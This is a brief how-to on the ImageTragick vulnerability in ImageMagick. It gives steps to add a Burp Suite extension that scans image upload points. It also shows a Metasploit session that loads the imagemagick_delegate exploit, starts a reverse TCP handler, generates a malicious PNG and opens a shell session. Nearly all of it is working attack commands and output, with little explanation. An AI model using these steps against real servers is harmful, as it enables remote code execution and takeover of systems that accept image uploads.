ImageTragick using BurpSuite and Metasploit

BurpSuite

  1. Download burp-image-size.jar
  2. BurpSuite >> Extender >> Extensions >> Add >> select burp-image-size.jar
  3. using burpsuite to scan upload point

Metasploit

1
2
3
4
5
6
7
8
9
> msfconsole
msf> use exploit/unix/fileformat/imagemagick_delegate
msf> set LPORT 8080
msf> exploit -j
msf exploit(imagemagick_delegate) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.5.41:8080
msf exploit(imagemagick_delegate) > [+] msf.png stored at /Users/xl7dev/.msf4/local/msf.png
msf exploit(imagemagick_delegate) > session -i 1